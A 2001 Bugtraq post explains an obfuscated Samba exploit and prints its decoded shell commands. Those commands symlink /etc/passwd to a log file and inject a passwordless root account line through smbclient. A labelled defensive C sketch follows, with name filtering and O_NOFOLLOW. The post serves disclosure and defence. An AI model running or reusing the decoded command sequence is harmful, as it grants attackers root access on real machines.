[23003] in bugtraq

Samba Exploit Code

daemon@ATHENA.MIT.EDU (Dave Ahmad)
Thu Oct 25 23:37:43 2001

Date: Thu, 25 Oct 2001 21:33:23 -0600 (MDT)
From: Dave Ahmad <da@securityfocus.com>
To: <bugtraq@securityfocus.com>
Message-ID: <Pine.GSO.4.30.0110252123380.7307-100000@mail>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII


Hey,

There is some confusion about the Samba exploit.  It is an obfuscated
exploit for an old vulnerability in the Samba daemon.  Before approving it
to the list, I checked it.

The system() calls:

system(inject1, 0);
system(inject2, 0);
system(inject3a, 0);

Try this:

printf("%s\n%s\n%s\n",inject1,inject2,inject3a);

output:

/bin/rm -rf /tmp/x.log
/bin/ln -s /etc/passwd /tmp/x.log
/usr/bin/smbclient //localhost/"

fd::0:0::/:/bin/sh\n" -n ../../../tmp/x -N

I am not sure why they chose to write the exploit this way.

Regards,

Dave Ahmad
SecurityFocus
www.securityfocus.com
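
Added example, not part of the original message or of Samba's code: a defensive sketch of the two checks that make the decoded commands above harmless, assuming the daemon builds a per-client log path as `<dir>/<name>.log` from a client-supplied name. The function names, the 15-character limit (the longest NetBIOS name) and the temporary paths are assumptions made for this illustration.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L   /* for O_NOFOLLOW, mkdtemp, symlink */
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical helper: accept only a single plain path component. */
int name_is_safe(const char *name)
{
    size_t i, n = strlen(name);
    if (n == 0 || n > 15 || strcmp(name, ".") == 0 || strcmp(name, "..") == 0)
        return 0;                       /* 15 = longest NetBIOS name */
    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)name[i];
        if (c == '/' || c == '\\' || c < 0x20 || c == 0x7f)
            return 0;                   /* separators and control bytes */
    }
    return 1;
}

/* Hypothetical helper: open <dir>/<name>.log for append, or return -1. */
int open_client_log(const char *dir, const char *name)
{
    char path[1024];
    int n;
    if (!name_is_safe(name)) { errno = EINVAL; return -1; }
    n = snprintf(path, sizeof path, "%s/%s.log", dir, name);
    if (n < 0 || (size_t)n >= sizeof path) { errno = ENAMETOOLONG; return -1; }
    /* O_NOFOLLOW: fail instead of writing through a planted symlink. */
    return open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW, 0600);
}

/* Constructed check: returns 1 when a symlinked log path is refused. */
int symlink_is_refused(void)
{
    char dir[] = "/tmp/logdemoXXXXXX", target[64], lnk[64];
    int fd;
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(lnk, sizeof lnk, "%s/x.log", dir);
    if (symlink(target, lnk) != 0) return -1;
    fd = open_client_log(dir, "x");     /* x.log is a symlink here */
    if (fd >= 0) close(fd);
    unlink(lnk); unlink(target); rmdir(dir);
    return fd < 0;
}
```

Either check alone breaks the sequence in the decoded output: the name filter rejects `../../../tmp/x`, and `O_NOFOLLOW` refuses a log path that has been replaced by a symlink.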